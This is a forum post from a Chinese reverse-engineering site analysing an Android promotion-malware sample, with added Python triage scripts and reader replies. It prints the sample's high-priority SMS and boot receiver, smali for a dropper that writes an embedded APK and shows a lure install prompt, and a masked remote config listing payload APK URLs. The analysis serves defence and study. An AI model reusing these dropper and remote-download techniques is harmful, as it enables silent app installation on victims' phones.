52pojie (吾爱破解) - LCG - LSG | Android Cracking | Virus Analysis | www.52pojie.cn

[Mobile Sample Analysis] A simple analysis of a malicious app-promotion sample

kangkai posted on 2015-10-22 00:56
This post was last edited by kangkai on 2015-10-22 01:04.

1. Sample information
File: C:\Users\mattpeng\Desktop\demowy.apk
Size: 1431275 bytes
Modified: 20151021, 22:46:11
MD5: 682BE9D3335D21A****31FC3915B4E2
SHA1: 0DCAA12742FA62586D4070DD1EA47579D9A0E38E
CRC32: 747F4DA5
Package: com.fywx.video

2. Detailed analysis

1. Start with the AndroidManifest.xml. Luckily the sample has not been packed or hardened, so it is readable. It grants the malware a very large number of permissions, many of them high-risk: sending SMS, placing phone calls, reading log files, restarting applications, and so on.

[XML]
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_DOWNLOAD_MANAGER"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH"/>
    <uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.RUN_INSTRUMENTATION"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>


2. The program is started whenever the phone receives an SMS, finishes booting, or is unlocked:

[XML]
    <service android:name="com.android.video1.MainService" android:enabled="true" />
    <receiver android:name="com.fy.fy_sdk.FPayReceiver">
        <intent-filter android:priority="2147483647">
            <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            <action android:name="android.intent.action.BOOT_COMPLETED" />
            <action android:name="android.intent.action.USER_PRESENT" />
        </intent-filter>
    </receiver>

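As an added example (not part of the original post), a small Python triage script that applies the checks from steps 1 and 2 to a manifest: it lists the high-risk permissions requested, notes duplicated entries, and flags any receiver that listens for SMS_RECEIVED with an extreme priority. The manifest embedded below is a constructed excerpt built from the permissions and receiver quoted above, and the set of permissions treated as dangerous is this example's own choice.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = "{%s}name" % ANDROID_NS          # android:name, namespace-qualified
PRIORITY = "{%s}priority" % ANDROID_NS  # android:priority on <intent-filter>
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Permissions this example treats as high-risk in combination (SMS, overlays, boot persistence).
DANGEROUS = {
    "android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS", "android.permission.WRITE_SMS",
    "android.permission.RECEIVE_WAP_PUSH", "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.RECEIVE_BOOT_COMPLETED", "android.permission.RESTART_PACKAGES",
}

# Constructed manifest excerpt: a subset of the permissions and the receiver quoted in the post.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.fywx.video">
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application>
    <service android:name="com.android.video1.MainService" android:enabled="true"/>
    <receiver android:name="com.fy.fy_sdk.FPayReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

def triage(manifest_xml):
    root = ET.fromstring(manifest_xml)
    perms = [p.get(NAME) for p in root.iter("uses-permission")]
    sms_receivers = []
    for rcv in root.iter("receiver"):
        for flt in rcv.findall("intent-filter"):
            if SMS_RECEIVED in {a.get(NAME) for a in flt.findall("action")}:
                prio = int(flt.get(PRIORITY, "0"))
                # Integer.MAX_VALUE priority: the classic bid to see the SMS broadcast first
                # (and, on old Android versions, abort it before the default SMS app sees it).
                sms_receivers.append((rcv.get(NAME), prio, prio >= 2**31 - 1))
    return {
        "package": root.get("package"),
        "dangerous": sorted(set(perms) & DANGEROUS),
        "duplicates": sorted({p for p in perms if perms.count(p) > 1}),
        "sms_receivers": sms_receivers,
    }
```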
3. Let's first look at com.android.video1.MainService. Scrolling down, we find a fairly important conditional branch:

[Asm]
    if-nez v1, :cond_3
    const-string v1, "Video1.MainActivity"
    const-string v2, "Star MainService"
Now the decompiled source:

[Java]
    if (!a.a)
    {
      Log.e("Video1.MainActivity", "Star MainService");
      localObject = new Intent("com.android.video1.install_from_shortcut");
      ((Intent)localObject).setClass(this, MainService.class);
      ((Intent)localObject).putExtra("shortcutid", paramBundle);
      startService((Intent)localObject);
    }

Now the condition itself. This check mainly determines whether the app has already been installed on the phone: if it has, the installation is skipped and execution moves on to the next step; if it has not, the installation is carried out.


   
[Asm]
    const-string v0, "Check install"
    const-string v1, "check"

    invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I

    invoke-virtual {p0}, Landroid/app/Activity;->getPackageManager()Landroid/content/pm/PackageManager;

    const-string v3, "video.apk"

    invoke-direct {v1, v2, v3}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V

    sput-object v1, Lcom/fywx/a/a;->e:Ljava/io/File;

    sget-object v1, Lcom/fywx/a/a;->e:Ljava/io/File;

    invoke-virtual {v1}, Ljava/io/File;->exists()Z

    move-result v1

    if-nez v1, :cond_0

    new-instance v1, Ljava/io/FileOutputStream;

    sget-object v2, Lcom/fywx/a/a;->e:Ljava/io/File;

    invoke-direct {v1, v2}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V

    const/16 v2, 0x400

    new-array v2, v2, [B

    :goto_0
    invoke-virtual {v0, v2}, Ljava/io/InputStream;->read([B)I

    move-result v3

    if-gtz v3, :cond_2

    invoke-virtual {v1}, Ljava/io/FileOutputStream;->close()V

    invoke-virtual {v0}, Ljava/io/InputStream;->close()V
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0

    :cond_0
    :goto_1
    new-instance v0, Landroid/app/AlertDialog$Builder;

    invoke-direct {v0, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V

    sput-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    new-instance v1, Landroid/graphics/drawable/BitmapDrawable;

    const-string v2, "/res/drawable-hdpi/ic_launcher.png"

    invoke-static {v2}, Ljava/lang/ClassLoader;->getSystemResourceAsStream(Ljava/lang/String;)Ljava/io/InputStream;

    move-result-object v2

    invoke-direct {v1, v2}, Landroid/graphics/drawable/BitmapDrawable;-><init>(Ljava/io/InputStream;)V

    invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setIcon(Landroid/graphics/drawable/Drawable;)Landroid/app/AlertDialog$Builder;

    sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    invoke-virtual {v0, v5}, Landroid/app/AlertDialog$Builder;->setCancelable(Z)Landroid/app/AlertDialog$Builder;

    sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    const-string v1, "\u5b89\u88c5\u89c6\u9891\u4e0b\u8f7d\u63d2\u4ef6\u63d0\u793a"

    invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setTitle(Ljava/lang/CharSequence;)Landroid/app/AlertDialog$Builder;

    sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    const-string v1, "\u60a8\u9700\u8981\u5b89\u88c5\u89c6\u9891\u63d2\u4ef6\u624d\u53ef\u4ee5\u89c2\u770b\u672c\u5e94\u7528\u5185\u7684\u5404\u79cd\u6fc0\u60c5\u89c6\u9891\u3002\u662f\u5426\u5b89\u88c5\u89c6\u9891\u63d2\u4ef6\uff1f"

    invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setMessage(Ljava/lang/CharSequence;)Landroid/app/AlertDialog$Builder;

    sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    const-string v1, "\u5b89\u88c5"

    new-instance v2, Lcom/fywx/a/b;

    invoke-direct {v2, p0}, Lcom/fywx/a/b;-><init>(Landroid/app/Activity;)V

    invoke-virtual {v0, v1, v2}, Landroid/app/AlertDialog$Builder;->setPositiveButton(Ljava/lang/CharSequence;Landroid/content/DialogInterface$OnClickListener;)Landroid/app/AlertDialog$Builder;

    sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;

    const-string v1, "\u53d6\u6d88"


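As an added example (not from the original post), a Python helper for reading a smali excerpt like the one above: it decodes the \uXXXX string literals so the lure dialog becomes readable, groups the invoked framework methods by class, and derives the two behaviours this routine shows (writing an embedded APK to disk, then presenting an install dialog). The smali embedded below is a constructed excerpt of the lines quoted above; the indicator names are this example's own.

```python
import re

# Constructed smali excerpt: lines copied from the dropper routine quoted above.
SMALI = r'''
    const-string v3, "video.apk"
    invoke-direct {v1, v2, v3}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
    invoke-virtual {v1}, Ljava/io/File;->exists()Z
    invoke-direct {v1, v2}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
    invoke-virtual {v0, v2}, Ljava/io/InputStream;->read([B)I
    const-string v2, "/res/drawable-hdpi/ic_launcher.png"
    const-string v1, "\u5b89\u88c5\u89c6\u9891\u4e0b\u8f7d\u63d2\u4ef6\u63d0\u793a"
    invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setTitle(Ljava/lang/CharSequence;)Landroid/app/AlertDialog$Builder;
    const-string v1, "\u5b89\u88c5"
    invoke-virtual {v0, v1, v2}, Landroid/app/AlertDialog$Builder;->setPositiveButton(Ljava/lang/CharSequence;Landroid/content/DialogInterface$OnClickListener;)Landroid/app/AlertDialog$Builder;
'''

# const-string / const-string/jumbo followed by a Java-style quoted literal
CONST_STRING = re.compile(r'const-string(?:/jumbo)?\s+\w+,\s*"((?:[^"\\]|\\.)*)"')
# any invoke-* instruction: capture the class descriptor and the method name
INVOKE = re.compile(r'invoke-\w+(?:/range)?\s+\{[^}]*\},\s*(L[^;]+);->([\w<>$]+)\(')

def decode_smali_string(literal):
    """Resolve baksmali escapes (\\uXXXX, \\n, \\", ...) into readable text."""
    return literal.encode("ascii", "backslashreplace").decode("unicode_escape")

def triage(smali_text):
    """Return decoded string literals, invoked methods per class, and behaviour indicators."""
    strings = [decode_smali_string(m.group(1)) for m in CONST_STRING.finditer(smali_text)]
    apis = {}
    for cls, method in INVOKE.findall(smali_text):
        apis.setdefault(cls, set()).add(method)
    # Indicators for this sample: write an embedded APK to disk, then show a dialog
    # that talks the user into installing it.
    indicators = {
        "writes_file": "Ljava/io/FileOutputStream" in apis,
        "shows_dialog": "Landroid/app/AlertDialog$Builder" in apis,
        "dropped_apks": [s for s in strings if s.lower().endswith(".apk")],
    }
    return strings, apis, indicators
```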
Once the check has run, control returns to MainActivity and continues on to MainService.

The first line of MainService is .field public static a:Lcom/android/video1/z, so let's go and look at com.android.video1.z.

Luckily, we find a new object being created together with a constant string:

[Asm]
    new-instance v0, Lorg/apache/http/client/methods/HttpGet;

    new-instance v3, Ljava/lang/StringBuilder;     # create a new StringBuilder object

    const-string v4, "http://adverapk.****.aliyuncs.com/config%2******.txt?"


Fetching this URL shows what it actually serves: the whole file is a list of apps to promote.

[JSON]
{
  "PopStartTime": "20",
  "PopTime": "30",
  "FlashStartTime": "15",
  "ImageStartTime": "60",
  "ImageTime": "60",
  "AdItem": [
    {
      "Id": "10461",
      "Name": "无码爽播",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "2",
      "Intro": "",
      "Size": "1385",
      "MD5": "93F6FE9390216A40A357713954938599",
      "Delay": "2",
      "PackageName": "tfdufhkx.msmuycsd.yggfvnsb",
      "Activity": "com.dm.ts.DmtestActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2Fshipin.apk",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2F12.png"
    },
    {
      "Id": "10462",
      "Name": "成人小说",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "5",
      "Intro": "成人小说",
      "Size": "2404",
      "MD5": "484B0AFDA43EFEF0C65B967CAF36B212",
      "IconAdd": "",
      "PackageName": "jxrnyg.bcolovo.kbkbyf",
      "Activity": "com.atnl.adultnovel.book.activity.StateAcitvity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fxiaoshuo%2Fchengrenxiaoshou.apk",
      "FullImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fxiaoshuo%2Fcr.png"
    },
    {
      "Id": "10473",
      "Name": "无码爽播",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "5",
      "Intro": "无码爽播",
      "Size": "1385",
      "MD5": "93F6FE9390216A40A357713954938599",
      "IconAdd": "",
      "PackageName": "tfdufhkx.msmuycsd.yggfvnsb",
      "Activity": "com.dm.ts.DmtestActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2Fshipin.apk",
      "FullImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2F0000.png"
    },
    {
      "Id": "10465",
      "Name": "全民酷跑",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "3",
      "Intro": "全民酷跑",
      "Size": "8254",
      "MD5": "C8F8643EAF93F870F999BCD8175FC872",
      "IconAdd": "",
      "PackageName": "com.ezgame.skater",
      "Activity": "com.snowfish.cn.ganga.offline.helper.SFGameSplashActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/apks%2Fquanmingkupao%2Fquanmingkupao.apk",
      "PopImgAdd": [
        "http://adverapk.*********.aliyuncs.com/qudao%2Fhlq%2Fqmkp%2F5.jpg"
      ]
    },
    {
      "Id": "10466",
      "Name": "成人小说",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "2",
      "Intro": "",
      "Size": "2404",
      "MD5": "484B0AFDA43EFEF0C65B967CAF36B212",
      "Delay": "2",
      "PackageName": "jxrnyg.bcolovo.kbkbyf",
      "Activity": "com.atnl.adultnovel.book.activity.StateAcitvity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fxiaoshuo%2Fchengrenxiaoshou.apk",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2F1.jpg"
    },
    {
      "Id": "10469",
      "Name": "桃桃斗地主",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "3",
      "Intro": "美女和你一起斗地主桃桃斗地主",
      "Size": "9850",
      "MD5": "2E6ADDBDF0CC422DAFC6D97D13C62192",
      "IconAdd": "",
      "PackageName": "com.meiqu.ddzdj.zimon",
      "Activity": "com.open.sdk.DoActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fqxjwl%2Ftaotaodoudizhu%2Ftaotao.apk",
      "PopImgAdd": [
        "http://adverapk.*********.aliyuncs.com/qudao%2Fqxjwl%2Ftaotaodoudizhu%2Fdoulun.png"
      ]
    },
    {
      "Id": "10472",
      "Name": "万能WIFI",
      "Intro": "万能WIFI,让你随时随地上网",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "1",
      "Size": "548",
      "MD5": "3D1FE5B1F4051BD40228E18DBFCC571C",
      "Delay": "14",
      "PackageName": "inspnmm.xhx.neets",
      "Activity": "com.huluxia.wifi.MainActivity",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Fwifi.png",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Fwifi100902.apk",
      "NotifyImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Faaa.png"
    },
    {
      "Id": "10485",
      "Name": "超级加速器",
      "Intro": "一款专注于手机内存清理、优化的超级加速软件,强力、持久释放内存",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "1",
      "Size": "843",
      "MD5": "3D1FE5B1F4051BD40228E18DBFCC571C",
      "Delay": "14",
      "PackageName": "com.apusapps.tools.boosterfq",
      "Activity": "com.apusapps.tools.booster.ui.BoostMainActivity",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2Ficon.png",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2Fchaoji.apk",
      "NotifyImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2FL.png"
    }, 
    {
      "Id": "10478",
      "Name": "夫妻笑话大湿",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "2",
      "Intro": "",
      "Size": "2",
      "MD5": "7af8f2a17c40694ecca4be1533ae29d1",
      "Delay": "2",
      "PackageName": "com.mobapp.jokecouble21013",
      "Activity": "com.mobapp.jokecouble.WelcomeActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffuqixiaohuadashi%2Fjoke100901.apk",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffuqixiaohuadashi%2Ficon.png"
    },
    {
      "Id": "10482",
      "Name": "高清直播",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "5",
      "Intro": "日韩美随你看。。",
      "Size": "1077",
      "MD5": "e4e97d05ee8ba44fa5e4fc91f2dd9c8b",
      "IconAdd": "",
      "PackageName": "com.dsedsa.sdgfrtd",
      "Activity": "com.icon.IconActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fgaoqinzhibo%2Fgaoqin.apk",
      "FullImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fgaoqinzhibo%2Fq.png"
    },
    {
      "Id": "10483",
      "Name": "寂寞快播",
      "Intro": "夜深的时候,看片神器",
      "Size": "1187",
      "MD5": "ae59592d3d2e1c590f9c605c6b8a6b30",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "9",
      "Align": "down",
      "PackageName": "KI6k.Dc0O.Xh7R.E894",
      "Activity": "com.xiaochen.android.yyeuw.ui.UserNavAct",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fjimokuaibo%2Fic_launcher.png",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fjimokuaibo%2Fkuaibo.apk",
      "ImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fjimokuaibo%2Fm.gif"
    },
    {
      "Id": "10480",
      "Name": "泡泡龙",
      "Intro": "饭后一起打泡泡吧",
      "Size": "6482",
      "MD5": "986527388747090a9e7e44411bcaafe9",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "安徽,广西,贵州,海南,河北,黑龙江,湖北,吉林,辽宁,内蒙古,宁夏,青海,天津,西藏,新疆,云南",
      "Type": "9",
      "Align": "top",
      "PackageName": "com.fireflygame.popolong.tp",
      "Activity": "org.cocos2dx.cpp.AppActivity",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fpaopaolong%2FICON.png",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fpaopaolong%2Fpaopao.apk",
      "ImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fpaopaolong%2Fp.png"
    }, 
    {
      "Id": "10484",
      "Name": "辣妹影院",
      "Operator": "中国移动,中国联通,中国电信",
      "Province": "0",
      "Type": "2",
      "Intro": "",
      "Size": "2",
      "MD5": "906273646affdbcc222da97c001a0216",
      "Delay": "2",
      "PackageName": "com.g.ees.appab",
      "Activity": "com.g.ees.appab.BrowseActivity",
      "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Flameiyy%2Flamei.apk",
      "IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Flameiyy%2Ficon.png"
    }
  ]
}

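As an added example (not part of the original post), a Python summary of this config format from the defender's side: it turns the AdItem list into a package watchlist and download-host list, and flags entries that declare the same MD5 for payloads of different sizes, which the full file above does contain (Ids 10472 and 10485). The JSON embedded below is a constructed three-entry excerpt of that file, keeping the masking used in the post.

```python
import json
from collections import defaultdict
from urllib.parse import urlparse

# Constructed excerpt of the remote config: three AdItem entries copied from the file above.
CONFIG = """{
  "PopStartTime": "20", "PopTime": "30",
  "AdItem": [
    {"Id": "10461", "Name": "无码爽播", "Type": "2", "Size": "1385", "Delay": "2",
     "MD5": "93F6FE9390216A40A357713954938599", "PackageName": "tfdufhkx.msmuycsd.yggfvnsb",
     "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2Fshipin.apk"},
    {"Id": "10472", "Name": "万能WIFI", "Type": "1", "Size": "548", "Delay": "14",
     "MD5": "3D1FE5B1F4051BD40228E18DBFCC571C", "PackageName": "inspnmm.xhx.neets",
     "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Fwifi100902.apk"},
    {"Id": "10485", "Name": "超级加速器", "Type": "1", "Size": "843", "Delay": "14",
     "MD5": "3D1FE5B1F4051BD40228E18DBFCC571C", "PackageName": "com.apusapps.tools.boosterfq",
     "APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2Fchaoji.apk"}
  ]
}"""

def summarize(config_text):
    """Turn the ad config into a watchlist plus consistency findings."""
    items = json.loads(config_text).get("AdItem", [])
    by_md5 = defaultdict(list)
    for it in items:
        by_md5[it["MD5"].lower()].append(it)
    # One MD5 declared for payloads of different sizes cannot all be right: either one
    # APK is pushed under several names or the client never verifies the hash at all.
    md5_conflicts = {h: sorted(it["Id"] for it in lst) for h, lst in by_md5.items()
                     if len({it["Size"] for it in lst}) > 1}
    return {
        "count": len(items),
        "packages": sorted({it["PackageName"] for it in items}),  # what to hunt for on devices
        "hosts": sorted({urlparse(it["APKAdd"]).netloc for it in items if it.get("APKAdd")}),
        "md5_conflicts": md5_conflicts,
    }
```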





OP | kangkai posted on 2015-10-28 16:22
    willJ posted on 2015-10-23 09:30
    So here's the question: without root privileges, how does it get these promoted apps installed?

Actually, this app does a root check and tries to obtain root privileges; if that fails, it lures the user into installing them.
小朋友呢 posted on 2015-10-22 08:13
zxf261 posted on 2015-10-22 08:22
willJ posted on 2015-10-23 09:30
So here's the question: without root privileges, how does it get these promoted apps installed?
woshenxia posted on 2015-10-23 14:48
Could the OP share the sample so we can practise analysing it?
Mr.Mlwareson_V posted on 2015-10-28 15:28
Great analysis, learned a lot.
ytvirus posted on 2015-11-3 16:14
Very good! Nice work, learned something....
jiejing posted on 2015-12-2 12:36
Bro, please share the sample.
一个小菜鸟 posted on 2016-4-6 18:29
Send me a copy of the sample too.